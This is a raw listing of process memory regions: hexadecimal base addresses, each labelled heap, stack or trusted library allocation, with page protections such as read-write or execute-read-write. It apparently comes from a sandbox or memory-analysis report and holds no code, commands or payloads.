trusted library allocation
page read and write
229C4320000
trusted library allocation
page read and write
281D1CA1000
heap
page read and write
7FF9A5BD2000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229AD522000
trusted library allocation
page read and write
229C4342000
trusted library allocation
page read and write
229C45CE000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
7FF9A5890000
trusted library allocation
page read and write
229C4392000
trusted library allocation
page read and write
229C45D6000
trusted library allocation
page read and write
229C4445000
heap
page read and write
229C4392000
trusted library allocation
page read and write
229AD1A8000
trusted library allocation
page read and write
7FF9A5800000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C4929000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
7FF9A5850000
trusted library allocation
page read and write
229C445C000
heap
page read and write
D3B697E000
stack
page read and write
229C45BE000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C45B2000
trusted library allocation
page read and write
229C444D000
heap
page read and write
7FF9A5761000
trusted library allocation
page read and write
229C4970000
trusted library allocation
page read and write
7FF9A5A53000
trusted library allocation
page read and write
229C492F000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229AD5C5000
trusted library allocation
page read and write
229AA2E0000
heap
page readonly
229ABD10000
heap
page read and write
229ACBEE000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C441D000
heap
page read and write
229C439B000
trusted library allocation
page read and write
229ACF6C000
trusted library allocation
page read and write
229C4426000
heap
page read and write
281D2220000
trusted library allocation
page read and write
229C457C000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C45C4000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
7FF9A5670000
trusted library allocation
page execute and read and write
229C43E7000
heap
page read and write
229C43D6000
heap
page read and write
229ACB46000
trusted library allocation
page read and write
229C4DA0000
trusted library allocation
page read and write
229C4925000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
281BA180000
trusted library allocation
page read and write
7FF9A55E0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4360000
trusted library allocation
page read and write
229C49A9000
heap
page read and write
281B9761000
trusted library allocation
page read and write
229C44A9000
heap
page read and write
229C4345000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
281BA0B8000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229AA2D0000
trusted library allocation
page read and write
229C49F0000
trusted library allocation
page read and write
229C4976000
trusted library allocation
page read and write
7FF9A5700000
trusted library allocation
page execute and read and write
229BC21E000
trusted library allocation
page read and write
229C438A000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C444D000
heap
page read and write
229C4930000
trusted library allocation
page read and write
229C45B2000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
281B7C4E000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229AD04D000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4970000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C43B6000
heap
page read and write
7FF9A5B18000
trusted library allocation
page read and write
281D1D02000
heap
page read and write
229ABD0A000
heap
page read and write
229C45CC000
trusted library allocation
page read and write
281B9BE0000
heap
page execute and read and write
281BA10F000
trusted library allocation
page read and write
229C4921000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
7FF9A57D0000
trusted library allocation
page execute and read and write
229C44A8000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C49C0000
trusted library allocation
page read and write
229C45B5000
trusted library allocation
page read and write
229C43BF000
heap
page read and write
229C4397000
trusted library allocation
page read and write
281C9C40000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45C4000
trusted library allocation
page read and write
229AA259000
heap
page read and write
229C4397000
trusted library allocation
page read and write
7FF9A5920000
trusted library allocation
page read and write
229AA1E6000
heap
page read and write
229C4394000
trusted library allocation
page read and write
281BA0BF000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229BC1E1000
trusted library allocation
page read and write
229AD066000
trusted library allocation
page read and write
229C45C9000
trusted library allocation
page read and write
229C45AC000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4380000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C43B6000
heap
page read and write
229C4A10000
trusted library allocation
page read and write
7FF9A59F0000
trusted library allocation
page read and write
229AD5E5000
trusted library allocation
page read and write
281D1C59000
heap
page read and write
229C4920000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C4970000
trusted library allocation
page read and write
229C4921000
trusted library allocation
page read and write
229C4589000
heap
page read and write
7DF4BEF20000
trusted library allocation
page execute and read and write
229ABCB3000
heap
page read and write
229C441A000
heap
page read and write
229ABCEF000
heap
page read and write
281D1C4F000
heap
page read and write
229C4938000
trusted library allocation
page read and write
229ACCC1000
trusted library allocation
page read and write
229C439A000
trusted library allocation
page read and write
281BA146000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C43E7000
heap
page read and write
229C4930000
trusted library allocation
page read and write
229C4344000
trusted library allocation
page read and write
281D1C7F000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4921000
trusted library allocation
page read and write
281B9CC4000
trusted library allocation
page read and write
229C44CD000
heap
page read and write
281BA192000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
281D1D27000
heap
page read and write
281D1E00000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
281D1D1E000
heap
page read and write
229C4390000
trusted library allocation
page read and write
229C49D0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229ACC03000
trusted library allocation
page read and write
229ABC42000
heap
page read and write
229C43DA000
heap
page read and write
229ABC90000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229AA218000
heap
page read and write
281D1CCF000
heap
page read and write
229C4409000
heap
page read and write
229C456A000
heap
page read and write
86A94FE000
stack
page read and write
229AD693000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
7FF9A57A0000
trusted library allocation
page execute and read and write
229C45A0000
trusted library allocation
page read and write
229C45B9000
trusted library allocation
page read and write
7FF9A5810000
trusted library allocation
page read and write
229C4960000
trusted library allocation
page read and write
281B9675000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C49A0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
86A9A3F000
stack
page read and write
229AD702000
trusted library allocation
page read and write
229C4921000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C45CB000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
7FF9A5930000
trusted library allocation
page read and write
229C45B7000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C457A000
heap
page read and write
229C4380000
trusted library allocation
page read and write
229C45B4000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
86A967D000
stack
page read and write
281D1C47000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
229C43F7000
heap
page read and write
229C44A8000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C492A000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4580000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C4925000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4345000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C4397000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
7FF9A57B0000
trusted library allocation
page execute and read and write
229C4394000
trusted library allocation
page read and write
D3B71BE000
stack
page read and write
281B7B90000
heap
page read and write
229C4394000
trusted library allocation
page read and write
229ABCA8000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45B1000
trusted library allocation
page read and write
229C45C1000
trusted library allocation
page read and write
281B9D0A000
trusted library allocation
page read and write
229C45C9000
trusted library allocation
page read and write
229C448E000
heap
page read and write
7FF9A55ED000
trusted library allocation
page execute and read and write
229C49C0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229C493A000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229ACB01000
trusted library allocation
page read and write
281B7BB0000
heap
page read and write
229C4461000
heap
page read and write
229C45A0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
7FF9A5A00000
trusted library allocation
page read and write
229C4960000
trusted library allocation
page read and write
229C4342000
trusted library allocation
page read and write
281B7CC7000
heap
page read and write
229C4391000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229ACFBA000
trusted library allocation
page read and write
229C43B6000
heap
page read and write
229C45A0000
trusted library allocation
page read and write
229ACDFC000
trusted library allocation
page read and write
229C45B2000
trusted library allocation
page read and write
229AA160000
heap
page read and write
229C4930000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
281D1D10000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C4360000
trusted library allocation
page read and write
281B7FA5000
heap
page read and write
229C4920000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C44D1000
heap
page read and write
229C49C0000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C439A000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45C5000
trusted library allocation
page read and write
229C4524000
heap
page read and write
229C4405000
heap
page read and write
229ACDB2000
trusted library allocation
page read and write
229C43E2000
heap
page read and write
7FF9A58D0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4928000
trusted library allocation
page read and write
229C4970000
trusted library allocation
page read and write
229C4461000
heap
page read and write
229C4349000
trusted library allocation
page read and write
229BC1B1000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4924000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229ACF8E000
trusted library allocation
page read and write
D3B6EFA000
stack
page read and write
229C4970000
trusted library allocation
page read and write
7FF9A59C0000
trusted library allocation
page read and write
86A947E000
stack
page read and write
229BC3C7000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229AA1A2000
heap
page read and write
229ACF3D000
trusted library allocation
page read and write
229C43E7000
heap
page read and write
229C4980000
trusted library allocation
page read and write
281D1E00000
trusted library allocation
page read and write
7FF9A5810000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
229C45B3000
trusted library allocation
page read and write
7FF9A5910000
trusted library allocation
page read and write
281B7FA0000
heap
page read and write
229C4349000
trusted library allocation
page read and write
229C45DD000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C49C0000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
229C4330000
trusted library allocation
page read and write
7FF9A59B7000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C4A30000
trusted library allocation
page read and write
229C45CB000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4380000
trusted library allocation
page read and write
281D1E63000
heap
page read and write
229C44BC000
heap
page read and write
229C4990000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
7FF9A5666000
trusted library allocation
page read and write
229C447F000
heap
page read and write
229C43F7000
heap
page read and write
229C43CC000
heap
page read and write
229C4394000
trusted library allocation
page read and write
229C4397000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
7FF9A5980000
trusted library allocation
page read and write
281BA118000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229ACB91000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C4962000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
281B9C4B000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C43A0000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
229C43FE000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C4424000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4380000
trusted library allocation
page read and write
229C442D000
heap
page read and write
229C4990000
trusted library allocation
page read and write
281D1CA7000
heap
page read and write
229C4391000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C448D000
heap
page read and write
229AD01A000
trusted library allocation
page read and write
281C9C9D000
trusted library allocation
page read and write
229AD4F4000
trusted library allocation
page read and write
281B9620000
heap
page readonly
229ABC00000
heap
page read and write
229C43EF000
heap
page read and write
229C4970000
trusted library allocation
page read and write
229C4980000
trusted library allocation
page read and write
229C4345000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
281D1D28000
heap
page read and write
229C4930000
trusted library allocation
page read and write
229C45DD000
trusted library allocation
page read and write
229C45CA000
trusted library allocation
page read and write
7FF9A5A10000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4A40000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C43F8000
heap
page read and write
229C45C4000
trusted library allocation
page read and write
229C4475000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
281BA0F1000
trusted library allocation
page read and write
229AD0E2000
trusted library allocation
page read and write
229C4320000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
86A90F5000
stack
page read and write
229ABCBF000
heap
page read and write
7FF9A58C0000
trusted library allocation
page read and write
229ACF46000
trusted library allocation
page read and write
281B9764000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C4374000
trusted library allocation
page read and write
229AA16C000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4970000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C4494000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229BC3ED000
trusted library allocation
page read and write
229BC4B5000
trusted library allocation
page read and write
229AC1A0000
heap
page execute and read and write
229C45C0000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229AA375000
heap
page read and write
229C4391000
trusted library allocation
page read and write
281D1CCD000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
229C45C2000
trusted library allocation
page read and write
281D1E2E000
heap
page read and write
229C4380000
trusted library allocation
page read and write
229C448C000
heap
page read and write
7FF9A5950000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4929000
trusted library allocation
page read and write
229C4960000
trusted library allocation
page read and write
7FF9A5600000
trusted library allocation
page read and write
229C45C1000
trusted library allocation
page read and write
229AA1BE000
heap
page read and write
229C4391000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C43C2000
heap
page read and write
281D1E00000
trusted library allocation
page read and write
229C4320000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4A20000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229AA252000
heap
page read and write
7FF9A5A80000
trusted library allocation
page read and write
229ABCE3000
heap
page read and write
229C4930000
trusted library allocation
page read and write
229C4397000
trusted library allocation
page read and write
7FF9A59E0000
trusted library allocation
page read and write
7FF9A5764000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C4973000
trusted library allocation
page read and write
229ACAF1000
trusted library allocation
page read and write
229C45CB000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
281B7B20000
heap
page read and write
229C456F000
heap
page read and write
229C45A0000
trusted library allocation
page read and write
281BA15A000
trusted library allocation
page read and write
7FF9A55E3000
trusted library allocation
page execute and read and write
229C4390000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
281BA14F000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
281B9C20000
heap
page read and write
7FF9A5B10000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229ABC10000
heap
page read and write
229C45B3000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C45C7000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C4397000
trusted library allocation
page read and write
229C44C1000
heap
page read and write
281B9EF7000
trusted library allocation
page read and write
D3B713F000
stack
page read and write
229C45B0000
trusted library allocation
page read and write
229C45B6000
trusted library allocation
page read and write
229C45C5000
trusted library allocation
page read and write
229AD674000
trusted library allocation
page read and write
229C4924000
trusted library allocation
page read and write
229C4595000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C45BA000
trusted library allocation
page read and write
229C4346000
trusted library allocation
page read and write
281D1D0D000
heap
page read and write
229C4390000
trusted library allocation
page read and write
229AA203000
heap
page read and write
229C45C8000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C4436000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C4A1D000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229ABC09000
heap
page read and write
229ABBD0000
trusted library allocation
page read and write
229C4360000
trusted library allocation
page read and write
229C49B0000
trusted library allocation
page read and write
229C4990000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229ACC34000
trusted library allocation
page read and write
7FF9A57E0000
trusted library allocation
page read and write
281D1C6E000
heap
page read and write
229C44DF000
heap
page read and write
229C4390000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229ACE1C000
trusted library allocation
page read and write
229C439A000
trusted library allocation
page read and write
7FF9A5993000
trusted library allocation
page read and write
229C43DA000
heap
page read and write
7FF9A5752000
trusted library allocation
page read and write
229AD07F000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C45C5000
trusted library allocation
page read and write
229C44AA000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
7FF9A58F0000
trusted library allocation
page read and write
229AA211000
heap
page read and write
281D1CD8000
heap
page read and write
229C4399000
trusted library allocation
page read and write
229C4960000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C49A8000
heap
page read and write
7FF9A56D0000
trusted library allocation
page execute and read and write
229C45B2000
trusted library allocation
page read and write
229C4401000
heap
page read and write
229C45A1000
trusted library allocation
page read and write
229AD52A000
trusted library allocation
page read and write
229C43CB000
heap
page read and write
281B7CB9000
heap
page read and write
229C4938000
trusted library allocation
page read and write
229C4407000
heap
page read and write
229C45C5000
trusted library allocation
page read and write
281B7F40000
heap
page read and write
229C4340000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
281B7BE8000
heap
page read and write
229C4321000
trusted library allocation
page read and write
229C45B1000
trusted library allocation
page read and write
229C45AB000
trusted library allocation
page read and write
229C45C7000
trusted library allocation
page read and write
229C4380000
trusted library allocation
page read and write
229C441F000
heap
page read and write
229C44BD000
heap
page read and write
229AD1E7000
trusted library allocation
page read and write
7FF9A5AA0000
trusted library allocation
page execute and read and write
229C45C0000
trusted library allocation
page read and write
229C45BC000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229AA2B0000
trusted library allocation
page read and write
229C45B2000
trusted library allocation
page read and write
229ABCD0000
heap
page read and write
229C4390000
trusted library allocation
page read and write
229C45C3000
trusted library allocation
page read and write
229C45B1000
trusted library allocation
page read and write
229C4397000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
7FF9A5820000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
281D1E29000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C45B4000
trusted library allocation
page read and write
229C45B1000
trusted library allocation
page read and write
229C45C3000
trusted library allocation
page read and write
229AA223000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229AD533000
trusted library allocation
page read and write
229C445E000
heap
page read and write
229C44D5000
heap
page read and write
229C4970000
trusted library allocation
page read and write
229C43F1000
heap
page read and write
229C4970000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C4990000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
281B7C64000
heap
page read and write
229C4542000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229AD56D000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C4980000
trusted library allocation
page read and write
229C43E4000
heap
page read and write
229C4920000
trusted library allocation
page read and write
7FF9A5877000
trusted library allocation
page read and write
229C4960000
trusted library allocation
page read and write
229C445E000
heap
page read and write
229AA1AC000
heap
page read and write
229C4399000
trusted library allocation
page read and write
281D1D0D000
heap
page read and write
229C43BE000
heap
page read and write
229C440F000
heap
page read and write
229C4360000
trusted library allocation
page read and write
229C4390000
trusted library allocation
page read and write
229ABCAB000
heap
page read and write
229C4A60000
trusted library allocation
page read and write
229C449C000
heap
page read and write
229C4391000
trusted library allocation
page read and write
229C4546000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C4980000
trusted library allocation
page read and write
229C4344000
trusted library allocation
page read and write
229C4A20000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229C45C5000
trusted library allocation
page read and write
229C45C5000
trusted library allocation
page read and write
281B9C48000
trusted library allocation
page read and write
229ABC7E000
heap
page read and write
229C45C0000
trusted library allocation
page read and write
229C49D0000
trusted library allocation
page read and write
7FF9A59D0000
trusted library allocation
page execute and read and write
229C4399000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
7FF9A58E0000
trusted library allocation
page read and write
229C4960000
trusted library allocation
page read and write
281D1C3B000
heap
page read and write
229ACC2B000
trusted library allocation
page read and write
7FF9A5840000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
7FF9A5AC0000
trusted library allocation
page read and write
229C4330000
trusted library allocation
page read and write
229C45B4000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
7FF9A55F3000
trusted library allocation
page read and write
229C45E0000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
281D2120000
heap
page read and write
229C4990000
trusted library allocation
page read and write
D3B6D7F000
stack
page read and write
7FF9A55FB000
trusted library allocation
page read and write
281D1D0A000
heap
page read and write
229C4960000
trusted library allocation
page read and write
229C4380000
trusted library allocation
page read and write
7FF9A5850000
trusted library allocation
page read and write
229C441A000
heap
page read and write
229C4390000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229ABCDE000
heap
page read and write
229C4970000
trusted library allocation
page read and write
229C4980000
trusted library allocation
page read and write
D3B7D4D000
stack
page read and write
229C4394000
trusted library allocation
page read and write
229C45D6000
trusted library allocation
page read and write
229ABC8E000
heap
page read and write
7FF9A5880000
trusted library allocation
page read and write
229C4429000
heap
page read and write
7FF9A59B4000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
281BA162000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
7FF9A55B4000
trusted library allocation
page read and write
7FF9A5860000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
281B9BD0000
trusted library allocation
page read and write
229C43E7000
heap
page read and write
7FF9A5870000
trusted library allocation
page read and write
281B9F92000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C43F0000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
7FF9A5756000
trusted library allocation
page read and write
229C45C2000
trusted library allocation
page read and write
229AD5F0000
trusted library allocation
page read and write
281D1E29000
heap
page read and write
229C4394000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
281D1E00000
trusted library allocation
page read and write
229C43E8000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C45DA000
trusted library allocation
page read and write
229C4413000
heap
page read and write
229C4380000
trusted library allocation
page read and write
281D1CB2000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
229C441F000
heap
page read and write
229C4380000
trusted library allocation
page read and write
229C43B6000
heap
page read and write
229C4399000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
7FF9A5840000
trusted library allocation
page read and write
229C4920000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229C4921000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C4491000
heap
page read and write
7FF9A566C000
trusted library allocation
page execute and read and write
229ACCEC000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C45B1000
trusted library allocation
page read and write
229C4970000
trusted library allocation
page read and write
281D1E20000
heap
page read and write
229ACFC4000
trusted library allocation
page read and write
229C4341000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45B1000
trusted library allocation
page read and write
229C45BF000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229AD1DE000
trusted library allocation
page read and write
7FF9A5AB0000
trusted library allocation
page read and write
229C44A8000
heap
page read and write
281D1C44000
heap
page read and write
229C45CD000
trusted library allocation
page read and write
229C4930000
trusted library allocation
page read and write
229C4970000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
7DF4BEF30000
trusted library allocation
page execute and read and write
229BC4AD000
trusted library allocation
page read and write
229ABBC4000
trusted library allocation
page read and write
229C4399000
trusted library allocation
page read and write
D3B69FE000
stack
page read and write
229C4920000
trusted library allocation
page read and write
229ACFA1000
trusted library allocation
page read and write
229C45D0000
trusted library allocation
page read and write
229ABCAB000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
7FF9A55B2000
trusted library allocation
page read and write
229C4360000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4330000
trusted library allocation
page read and write
229C45CA000
trusted library allocation
page read and write
229C4348000
trusted library allocation
page read and write
229C4412000
heap
page read and write
229ACE13000
trusted library allocation
page read and write
229C44BF000
heap
page read and write
229C4342000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C4409000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C4391000
trusted library allocation
page read and write
229ABD15000
heap
page read and write
229C4937000
trusted library allocation
page read and write
281D1CD3000
heap
page read and write
229ACBC3000
trusted library allocation
page read and write
229AD896000
trusted library allocation
page read and write
229AC214000
trusted library allocation
page read and write
281D1E62000
heap
page read and write
229C45A0000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
281D1E34000
heap
page read and write
229ACFFD000
trusted library allocation
page read and write
D3B6FB7000
stack
page read and write
229AA24C000
heap
page read and write
229C45C4000
trusted library allocation
page read and write
229ACB2D000
trusted library allocation
page read and write
229AD030000
trusted library allocation
page read and write
7FF9A563C000
trusted library allocation
page execute and read and write
229C45B2000
trusted library allocation
page read and write
7FF9A55B3000
trusted library allocation
page execute and read and write
281B7CBB000
heap
page read and write
229C45D0000
trusted library allocation
page read and write
229ABCFA000
heap
page read and write
229AD098000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C43F6000
heap
page read and write
7FF9A5820000
trusted library allocation
page read and write
229C4398000
trusted library allocation
page read and write
229C4340000
trusted library allocation
page read and write
229AC3BA000
trusted library allocation
page read and write
229C45B0000
trusted library allocation
page read and write
229C45C1000
trusted library allocation
page read and write
229C4394000
trusted library allocation
page read and write
229C4449000
heap
page read and write
229C45B0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229C440B000
heap
page read and write
229C4930000
trusted library allocation
page read and write
229C4370000
trusted library allocation
page read and write
7FF9A57D0000
trusted library allocation
page read and write
229C45B1000
trusted library allocation
page read and write
229ACCB8000
trusted library allocation
page read and write
229C45A0000
trusted library allocation
page read and write
229C45C0000
trusted library allocation
page read and write
229AD1D6000
trusted library allocation
page read and write
229C4357000
heap
page execute and read and write
229C4397000
